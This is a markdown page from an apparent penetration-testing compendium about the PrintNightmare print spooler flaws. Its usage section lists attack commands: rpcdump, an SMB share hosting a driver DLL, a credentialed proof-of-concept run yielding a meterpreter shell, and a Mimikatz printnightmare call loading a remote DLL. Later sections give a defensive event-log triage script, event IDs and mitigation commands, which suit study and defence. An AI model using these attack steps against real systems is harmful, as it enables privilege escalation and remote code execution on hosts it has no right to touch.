killchain-compendium/Exploits/Windows/Further PrintNightmare.md

Print Nightmare

  • Privilege escalation via the Print Spooler service
  • Located at C:\Windows\System32\spoolsv.exe
  • Enabled by default
  • CVE-2021-1675 (locally exploitable) and CVE-2021-34527 (RCE) both affect the print spooler
  • The RCE path goes over DCE/RPC (the MS-RPRN / MS-PAR interfaces), calling RpcAddPrinterDriver or RpcAddPrinterDriverEx

Usage

  • Prepare a reverse shell
  • Check whether the target exposes the print spooler RPC interfaces (grep needs -E, otherwise the | is matched literally)
rpcdump.py @$TARGET_IP | grep -E 'MS-RPRN|MS-PAR'
  • Start an SMB server that hosts the driver DLL
smbserver.py share . -smb2support
  • Run the PoC with credentials to elevate
python CVE-2021-1675.py <domain of domaincontroller>/<user>:<password>@$TARGET_IP
  • Use the meterpreter session

Mimikatz

  • Mimikatz printnightmare module
misc::printnightmare /target:<domain.com> /authuser:<lowpriv_user> /authpassword:<password> /library:\\<domain.com>\path\to\printnightmare.dll

IOCs

  • RpcAddPrinterDriverEx() is called
  • Sygnia's write-up explains these IOCs
  • Splunk detection queries exist
  • Logs are Microsoft-Windows-PrintService/Admin and Microsoft-Windows-PrintService/Operational
  • Event IDs 316, 808, 811, 31017, 7031
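A small triage script over the two PrintService channels and the event IDs listed above, added here as an example (not code from the compendium). It takes exported event records as dicts (channel, id, message) and flags what a responder would look at first: a 316 driver add/update whose file list contains a UNC path or a file outside the driver store, an 808/811 plug-in load failure (rated high when the path is in the spool\drivers\x64\3\old\N staging directory that public PrintNightmare write-ups describe), and a 7031 spooler crash from the System log. The sample records, hosts, driver names and paths are constructed, not real telemetry.

```python
"""Triage exported Print Spooler events for PrintNightmare-style driver loads."""
import re

# Constructed sample records, modelled on the PrintService Admin/Operational
# channels plus a System-log 7031. Every path, host and driver name is hypothetical.
SAMPLE_EVENTS = [
    {"channel": "Microsoft-Windows-PrintService/Operational", "id": 316,
     "message": ("Printer driver Microsoft Print To PDF for Windows x64 Version-3 was added "
                 "or updated. Files:- C:\\Windows\\system32\\spool\\DRIVERS\\x64\\3\\mxdwdrv.dll, "
                 "C:\\Windows\\system32\\spool\\DRIVERS\\x64\\3\\mxdwdui.dll")},
    {"channel": "Microsoft-Windows-PrintService/Operational", "id": 316,
     "message": ("Printer driver 1234 for Windows x64 Version-3 was added or updated. "
                 "Files:- \\\\192.0.2.10\\share\\payload.dll, "
                 "C:\\Windows\\system32\\spool\\DRIVERS\\x64\\3\\unidrv.dll")},
    {"channel": "Microsoft-Windows-PrintService/Admin", "id": 808,
     "message": ("The print spooler failed to load a plug-in module "
                 "C:\\Windows\\system32\\spool\\DRIVERS\\x64\\3\\old\\1\\payload.dll, "
                 "error code 0x45A.")},
    {"channel": "System", "id": 7031,
     "message": "The Print Spooler service terminated unexpectedly. It has done this 1 time(s)."},
    {"channel": "Microsoft-Windows-PrintService/Operational", "id": 307,   # benign noise
     "message": "Document 12, Print Document owned by alice was printed on HP-LJ."},
]

# \\host\share\file : a driver file pulled from a remote share
UNC_RE = re.compile(r"\\\\[^\\\s,]+\\[^\s,]+")
# staging directory the spooler uses when an existing driver is "upgraded"
OLD_DIR_RE = re.compile(r"\\spool\\drivers\\x64\\3\\old\\\d+\\", re.IGNORECASE)
DRIVER_STORE = "c:\\windows\\system32\\spool\\drivers\\"


def driver_files(message):
    """Return the comma-separated file list that event 316 appends after 'Files:-'."""
    _, sep, tail = message.partition("Files:-")
    if not sep:
        return []
    return [f.strip() for f in tail.split(",") if f.strip()]


def triage(events):
    """Return a list of findings (dicts) ordered as the events were seen."""
    findings = []
    for ev in events:
        eid, msg = ev["id"], ev["message"]
        if eid == 316:
            for f in driver_files(msg):
                if UNC_RE.fullmatch(f):
                    findings.append({"id": eid, "severity": "high",
                                     "reason": "driver file loaded from UNC path", "detail": f})
                elif not f.lower().startswith(DRIVER_STORE):
                    findings.append({"id": eid, "severity": "medium",
                                     "reason": "driver file outside the driver store", "detail": f})
        elif eid in (808, 811):
            # any plug-in load failure is worth a look; the old\N staging path is the classic artefact
            sev = "high" if OLD_DIR_RE.search(msg) else "medium"
            findings.append({"id": eid, "severity": sev,
                             "reason": "spooler failed to load plug-in module", "detail": msg})
        elif eid == 7031 and "print spooler" in msg.lower():
            findings.append({"id": eid, "severity": "medium",
                             "reason": "print spooler crashed", "detail": msg})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f['severity']:>6}] event {f['id']}: {f['reason']} -> {f['detail']}")
```

Feed it real records by exporting the two channels (and the System log) to JSON and mapping each record to the same three keys; the thresholds are deliberately simple so the rules can be tightened to a site's own driver baseline.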

Mitigation

  • Stop and disable the service
Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled
  • Disable via Group Policy, under
Computer Configuration/Administrative Templates/Printers